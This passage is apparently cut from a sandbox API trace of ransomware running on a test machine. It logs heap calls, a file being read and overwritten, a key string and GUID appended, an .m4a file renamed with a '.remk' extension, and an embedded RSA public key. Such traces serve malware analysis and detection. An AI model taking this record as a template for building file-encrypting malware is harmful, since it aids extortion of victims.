hHeap=0x630000) returned 1 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.246] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6e8 [0234.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0234.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee700 [0234.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6d0 [0234.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee760 [0234.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0234.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0234.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee730 [0234.247] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee718 [0234.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee778 [0234.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee718 | out: hHeap=0x630000) returned 1 [0234.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee718 [0234.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee730 | out: hHeap=0x630000) returned 1 [0234.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0234.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0234.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0234.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6e8 | out: hHeap=0x630000) returned 1 [0234.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6e8 [0234.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0234.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee748 | out: hHeap=0x630000) returned 1 [0234.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0234.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee778 | out: hHeap=0x630000) returned 1 [0234.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0fc8 [0234.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0234.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0234.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0234.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6e8 | out: hHeap=0x630000) returned 1 [0234.248] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5b70 [0234.248] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0234.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fc8 | out: hHeap=0x630000) returned 1 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee718 | out: hHeap=0x630000) returned 1 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee760 | out: hHeap=0x630000) returned 1 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee700 | out: hHeap=0x630000) returned 1 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6d0 | out: hHeap=0x630000) returned 1 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.249] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee6b8 | out: hHeap=0x630000) returned 1 [0234.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc0c8 | out: hHeap=0x630000) returned 1 [0234.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0234.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0234.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0234.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0234.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0234.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0234.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.250] WriteFile (in: hFile=0x640, lpBuffer=0x37c4278*, nNumberOfBytesToWrite=0x1449f, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c4278*, lpNumberOfBytesWritten=0x3adfb14*=0x1449f, lpOverlapped=0x0) returned 1 [0234.250] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c4278 | out: hHeap=0x630000) returned 1 [0234.250] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x144a4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.251] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0234.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0234.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0234.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0234.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0234.251] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0234.251] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.251] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.251] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.251] CloseHandle (hObject=0x640) returned 1 [0234.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185c10 [0234.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x37bc408 [0234.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185c10 | out: hHeap=0x630000) returned 1 [0234.253] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\Y1jISSChT2WEecUSrE0s.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\y1jisscht2weecusre0s.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Gg6LaR4dxDzOQomZJ1UL\\Y1jISSChT2WEecUSrE0s.m4a.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gg6lar4dxdzoqomzj1ul\\y1jisscht2weecusre0s.m4a.remk")) returned 1 [0234.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc408 | out: hHeap=0x630000) returned 1 [0234.253] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.254] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0234.255] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ed6d280, ftCreationTime.dwHighDateTime=0x1d5dd8e, ftLastAccessTime.dwLowDateTime=0x545d5c40, ftLastAccessTime.dwHighDateTime=0x1d5df50, ftLastWriteTime.dwLowDateTime=0x545d5c40, ftLastWriteTime.dwHighDateTime=0x1d5df50, nFileSizeHigh=0x0, nFileSizeLow=0x144a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y1jISSChT2WEecUSrE0s.m4a", cAlternateFileName="Y1JISS~1.M4A")) returned 0 [0234.255] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0234.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0234.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0234.255] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0234.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0234.255] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0234.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.255] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0234.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0234.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0234.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0234.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vbTY960\\") returned="vbTY960\\" [0234.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0234.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0234.257] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0234.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.257] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0234.257] PathFindFileNameW (pszPath="") returned="" [0234.257] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vbTY960\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x278e4030, ftCreationTime.dwHighDateTime=0x1d5de33, ftLastAccessTime.dwLowDateTime=0x7dbaf380, ftLastAccessTime.dwHighDateTime=0x1d5d8b2, ftLastWriteTime.dwLowDateTime=0x7dbaf380, ftLastWriteTime.dwHighDateTime=0x1d5d8b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0234.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.257] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x278e4030, ftCreationTime.dwHighDateTime=0x1d5de33, ftLastAccessTime.dwLowDateTime=0x7dbaf380, ftLastAccessTime.dwHighDateTime=0x1d5d8b2, ftLastWriteTime.dwLowDateTime=0x7dbaf380, ftLastWriteTime.dwHighDateTime=0x1d5d8b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0234.257] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d9e4e0, ftCreationTime.dwHighDateTime=0x1d5e4b2, ftLastAccessTime.dwLowDateTime=0xd8b7f440, ftLastAccessTime.dwHighDateTime=0x1d5e0be, ftLastWriteTime.dwLowDateTime=0xd8b7f440, ftLastWriteTime.dwHighDateTime=0x1d5e0be, nFileSizeHigh=0x0, nFileSizeLow=0xc813, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5vtSd.wav", cAlternateFileName="")) returned 1 [0234.258] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vbTY960\\5vtSd.wav") returned=".wav" [0234.258] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vbTY960\\5vtSd.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vbty960\\5vtsd.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.258] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=51219) returned 1 [0234.258] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.260] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xc7ed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.260] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.262] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.262] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xc813, lpOverlapped=0x0) returned 1 [0234.263] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.263] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.263] lstrlenA (lpString="-----BEGIN PUBLIC 